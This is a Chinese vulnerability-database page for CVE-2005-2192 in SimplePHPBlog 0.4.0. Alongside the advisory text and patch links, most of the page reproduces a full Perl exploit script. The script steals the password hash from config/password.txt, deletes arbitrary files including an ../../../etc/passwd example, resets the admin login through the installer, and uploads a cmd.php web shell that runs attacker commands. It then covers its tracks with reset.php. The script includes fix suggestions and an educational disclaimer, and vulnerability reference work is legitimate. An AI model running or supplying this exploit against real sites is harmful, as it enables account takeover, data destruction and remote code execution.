CVE-2005-2192
CVSS5.0
发布时间 :2005-07-11 00:00:00
修订时间 :2016-10-17 23:25:42
NMCOE    

[原文]SimplePHPBlog 0.4.0 stores password hashes in config/password.txt with insufficient access control, which allows remote attackers to obtain passwords via a brute force attack.


[CNNVD]SimplePHPBlog 口令文件 信息泄露漏洞(CNNVD-200507-085)

        Simple PHP Blog是一款基于PHP的BLOG程序。
        Simple PHP Blog 0.4.0中存在信息泄露漏洞。
        由于Simple PHP Blog将用户口令的hash文件保存在config/password.txt,缺乏必要的访问控制,远程攻击者可通过HTTP请求远程直接获取该文件,通过暴力破解,可能造成敏感信息泄露。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2192
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2192
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-085
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112075901100640&w=2
(UNKNOWN)  BUGTRAQ  20050707 SimplePHPBlog 0.4.0 <= Remote Password Disclosure

- 漏洞信息

SimplePHPBlog 口令文件 信息泄露漏洞
中危 未知
2005-07-11 00:00:00 2006-08-24 00:00:00
远程  
        Simple PHP Blog是一款基于PHP的BLOG程序。
        Simple PHP Blog 0.4.0中存在信息泄露漏洞。
        由于Simple PHP Blog将用户口令的hash文件保存在config/password.txt,缺乏必要的访问控制,远程攻击者可通过HTTP请求远程直接获取该文件,通过暴力破解,可能造成敏感信息泄露。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://sourceforge.net/projects/sphpblog/files/

- 漏洞信息 (1191)

Simple PHP Blog <= 0.4.0 Multiple Remote Exploits (EDBID:1191)
php webapps
2005-09-01 Verified
0 Kenneth Belva
N/A [点击下载]
#!/usr/bin/perl -w
#===============================================================================
#	Title:		sphpblog_vulns.pl
#
#	Written by: 	Kenneth F. Belva, CISSP
#			Franklin Technologies Unlimited, Inc.
#			http://www.ftusecurity.com
#
#	Date: 		August 25, 2005
#
#	Version:	0.1
#
#	Description:	This program is for educational purposes only!
#			SimplePHPBlog as a few vulnerability which this
#			perl script demonstrates via an exploit.
#
#	Instructions:	Should be self-explanatory via the .pl help menu
#
#	Solutions:	
#			*** Solution 1
#			Change the line in comment_delete_cgi.php from
#			$logged_in = logged_in( false, true );    to
#			$logged_in = logged_in( true, true );
#
#			*** Solution 2
#			Place an .htaccess file with the following config in
#			the ./config directory:
#
#
#			#---------------------
#			#Snip .htaccess start
#			#---------------------			
#			IndexIgnore *
#
#			<Files .htaccess>
#			order allow,deny
#			deny from all
#			</Files>
#			
#			<Files *.txt>
#			order allow,deny
#			deny from all
#			</Files>
#			#---------------------
#			#Snip .htaccess end
#			#---------------------
#
#
#			*** Solution 3
#			See http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0885.html
#				for PHP modification to upload image script.
#===============================================================================



#-------------------------------------------------------------------------------
#	Global Paramaters
#-------------------------------------------------------------------------------
use strict;
use warnings;

use vars qw/ %args /;

use Getopt::Std;
require LWP::UserAgent;
my $ua = LWP::UserAgent->new;

#-------------------------------------------------------------------------------
#	Global Routines
#-------------------------------------------------------------------------------

#Determine Operating System
my $OperatingSystem = $^O;
my $unix = "";

#Set OS Parameter
if (index(lc($OperatingSystem),"win")!=-1){
		   $unix="0"; #windows system
	    }else{
		    $unix="1"; #unix system
	    }

#-------------------------------------------------------------------------------
#	The Main Menu
#-------------------------------------------------------------------------------

sub menu()
    {
	    if ($unix){system("clear");}
	    	else{system("cls");}

	    print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		   http://www.ftusecurity.com
________________________________________________________________________________

	Program	: $0
	Version	: v0.1
	Date	: 8/25/2005
	Descript: This perl script demonstrates a few flaws in
		  SimplePHPBlog.
	
	Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
		  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO 
		  NOT HAVE PERMISSION TO DO SO!
		  
		  Please see this script comments for solution/fixes 
		  to demonstrated vulnerabilities. 
		  http://www.simplephpblog.com

	Usage	: $0 [-h host] [-e exploit]
	
		-?      : this menu
		-h      : host
		-e	: exploit
			(1)	: Upload cmd.php in [site]/images/
			(2)	: Retreive Password file (hash)
			(3)	: Set New User Name and Password
				[NOTE - uppercase switches for exploits]
				-U	: user name
				-P	: password
			(4)	: Delete a System File
				-F	: Path and System File 

	Examples: $0 -h 127.0.0.1 -e 2
		  $0 -h 127.0.0.1 -e 3 -U l33t -P l33t
		  $0 -h 127.0.0.1 -e 4 -F ./index.php
		  $0 -h 127.0.0.1 -e 4 -F ../../../etc/passwd
		  $0 -h 127.0.0.1 -e 1
	";	
        
	exit;
    }


#-------------------------------------------------------------------------------
#	Initial Routine
#-------------------------------------------------------------------------------

    sub init()
    {

	use Switch;
	
	# colon ':' after letter says that option takes variable
        my $opt_string = 'e:U:P:h:F:?';
        getopts( "$opt_string", \%args ) or menu();
	
	#Load parameters
	my $exploit = $args{e};
	my $host = $args{h};
	my $user = $args{U};
	my $pass = $args{P};
	my $file = $args{F};
	
	# What shall we do today?
	switch (%args) {
		case "?"	{ menu();}
		case "e"	{
				switch ($exploit) {
					
					if ($unix){system("clear");}
					else{system("cls");}
					
					print "
________________________________________________________________________________
		  SimplePHPBlog v0.4.0 Exploits
			     by
		     Kenneth F. Belva, CISSP
		    http://www.ftusecurity.com
________________________________________________________________________________";


					# Upload cmd.php to /images
					case "1" {	print "\nRunning cmd.php Upload Exploit....\n\n";
							&UploadCmdPHP($host);}
					# Retrieve Username & Password hash
					case "2" {	print "\nRunning Username and Password Hash Retrieval Exploit....\n\n";
							&RetrievePwd($host."/config/password.txt");}
					# Replace Username and Password
					case "3" {	print "\nRunning Set New Username and Password Exploit....\n\n";
							&SetUserPwd($host,$user,$pass);}
					# Delete a System File
					case "4" {	print "\nRunning Delete System File Exploit....\n\n";
							&DeleteFile($host . "/comment_delete_cgi.php?y=05&m=08&comment=",$file);}

					} #end $exploit switch
					print "\n\n\n*** Exploit Completed....\nHave a nice day! :)\n";
				} #end "e" case
		else		{ menu();}
		} #end %args switch

    } #end sub init

#-------------------------------------------------------------------------------
#	Exploit #1: Upload File Via POST 
#-------------------------------------------------------------------------------

sub UploadCmdPHP {

	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common qw(POST);
	my $ua = LWP::UserAgent->new;
	
	$HTTP::Request::Common::DYNAMIC_FILE_UPLOAD++;

	#Step 1: Retrieve hash
	#-----------------------------------------------------------------------
	my $hash = &RetrievePwd($url."/config/password.txt");
	

	#Step 2: Delete Existing Password file (SetUserPwd)
	#Step 3: Create a temporary user id and password (SetUserPwd)
	#-----------------------------------------------------------------------
	&SetUserPwd($url,"a","a");
	

	#Step 4: Log into the app and get the PHPSession / my_id session variable
	#-----------------------------------------------------------------------
	my $SETcookie = &strip_session(&Login($url . "/login_cgi.php","a","a"));
	
	
	#Step 5: Create and upload our scripts (cmd.php & reset.php)
	#-----------------------------------------------------------------------
		&CreateTempPHPs();
	
	# Upload cmd.php
	my $path = "./cmd.php";
	my $file = "cmd.php";
	my $req = POST($url."/upload_img_cgi.php",
		Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type => 'form-data',
		Content => [userfile => [$path,$file],],
		);
	
	my $response = $ua->request($req);
	print "\nCreated cmd.php on target host: " . $url;
	#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	#return $response->as_string;
	
	# Upload reset.php
	$path = "./reset.php";
	$file = "reset.php";
		
	$req = POST($url."/upload_img_cgi.php",
		Cookie => 'PHPSESSID='.$SETcookie.'; my_id='.$SETcookie,
		Content_Type => 'form-data',
		Content => [userfile => [$path,$file],],
		);
	
	$response = $ua->request($req);
	print "\nCreated reset.php on target host: " . $url;
	#$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	#return $response->as_string;
	
		#Remove local PHP files
		&RemoveTempPHPs();

		
	#Step 6: Reset origional Passwpord
	#-----------------------------------------------------------------------
	&ResetHash($url."/images/reset.php",$hash);

	
	#Step 7: Pass command to delete reset.php (clean up)
	#-----------------------------------------------------------------------
	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=","./images/reset.php");
	print "\nRemoved reset.php from target host: " . $url;

	print "\n\nTo run command please go to following link: \n\t" . $url."/images/cmd.php?cmd=[your command]";
}

#-------------------------------------------------------------------------------
#	Exploit #2: Retrieve Password File 
#-------------------------------------------------------------------------------

sub RetrievePwd {
	
	my($url) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = GET($url);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	
	my $hash = $response->content;
	print "\nRetrieved Username and Password Hash: " . $hash; 
	return $hash

}


#-------------------------------------------------------------------------------
#	Exploit #3: Set New Username and Password 
#-------------------------------------------------------------------------------

sub SetUserPwd{

	my($url,$user,$pass) = @_;

	&DeleteFile($url . "/comment_delete_cgi.php?y=05&m=08&comment=", "./config/password.txt");
	&ResetPwd($url . "/install03_cgi.php?blog_language=english",$user,$pass);
}


#-------------------------------------------------------------------------------
#	POST to Reset Username and Password (must delete password file first)
#-------------------------------------------------------------------------------

sub ResetPwd {
	
	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ user  => $user,
			pass => $pass,
			submit => '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\n./config/password.txt created!";
	print "\nUsername is set to: ".$user;
	print "\nPassword is set to: ".$pass;
	
}


#-------------------------------------------------------------------------------
#	Exploit #4: Delete Password File 
#-------------------------------------------------------------------------------

sub DeleteFile {
	
	my($url,$file) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = GET($url.$file);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;
	print "\nDeleted File: ".$file; 
	
}


#-------------------------------------------------------------------------------
#	log into site
#-------------------------------------------------------------------------------

sub Login {

	my($url,$user,$pass) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ user  => $user,
			pass => $pass,
			submit => '%C2%A0Submit%C2%A0'
			]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\nLogged into SimplePHPBlog at: ".$url;
	print "\nCurrent Username '".$user."' and Password '".$pass."'...";
	
	return $response->header('Set-Cookie');
	
}


#-------------------------------------------------------------------------------
#	POST the hash
#-------------------------------------------------------------------------------

sub ResetHash {

	my($url,$hash) = @_;
	
	use LWP;
	use HTTP::Request::Common;
	my $ua = LWP::UserAgent->new;

	my $req = POST($url,
		      [ hash  => $hash]
		);
	
	my $response = $ua->request($req);

	$response->is_success or die "Failed to POST '$url': ", $response->status_line;

	print "\nReset Hash at: ".$url;
	print "\nReset Hash value: ".$hash;
	
	
}


#------------------------------------------------------
# Create Temp PHP files
#------------------------------------------------------

sub CreateTempPHPs{

	my($hash) = @_;

	open(PHPFILE, ">./cmd.php");
	print PHPFILE &CreateCmdPHP();
	close PHPFILE;
	print "\nCreated cmd.php on your local machine.";
	
	open(PHPFILE, ">./reset.php");
	print PHPFILE &CreateResetPHP();
	close PHPFILE;
	print "\nCreated reset.php on your local machine.";	
}

#------------------------------------------------------
# Remove Temp PHP files
#------------------------------------------------------

sub RemoveTempPHPs{

	unlink("./cmd.php");
	print "\nRemoved cmd.php from your local machine.";
	unlink("./reset.php");
	print "\nRemoved reset.php from your local machine.";
	
}


#------------------------------------------------------
# strip_session - Get PHP Session Variable
#------------------------------------------------------

sub strip_session {
	
	my($savedata) = @_;

	my $PHPstring = "PHPSESSID";
	my $semi = "\;";
	
	my $datalength = length($savedata);
	my $PHPstart= (index $savedata, $PHPstring)+10;
	my $PHPend = index $savedata,$semi,$PHPstart;
	my $PHPsession= substr $savedata, $PHPstart, ($PHPend-$PHPstart);
	return $PHPsession;
	
}


sub CreateCmdPHP(){
	
	return "

<?php

\$cmd = \$_GET[\'cmd\'];
echo \'<hr/><pre>\';
echo \'Command: \' . \$cmd;
echo '</pre><hr/><br>';

echo '<pre>';
\$last_line = system(\$cmd,\$output);
echo \'</pre><hr/>\';
?>.
"; # end 
	
}


sub CreateResetPHP(){
	
	return "

<?php

\$hash = \$_POST[\'hash\'];
\$fp = fopen(\"../config/password.txt\",\"w\");
fwrite(\$fp,\$hash);
fpclose(\$fp);

?>
"; #end return

}


#------------------------------------------------------
# 	Begin Routines
#------------------------------------------------------
	init();

# milw0rm.com [2005-09-01]
		

- 漏洞信息

17779
Simple PHP Blog (SPHPBlog) config/password.txt User Credential Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-07-07 Unknow
2005-07-07 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站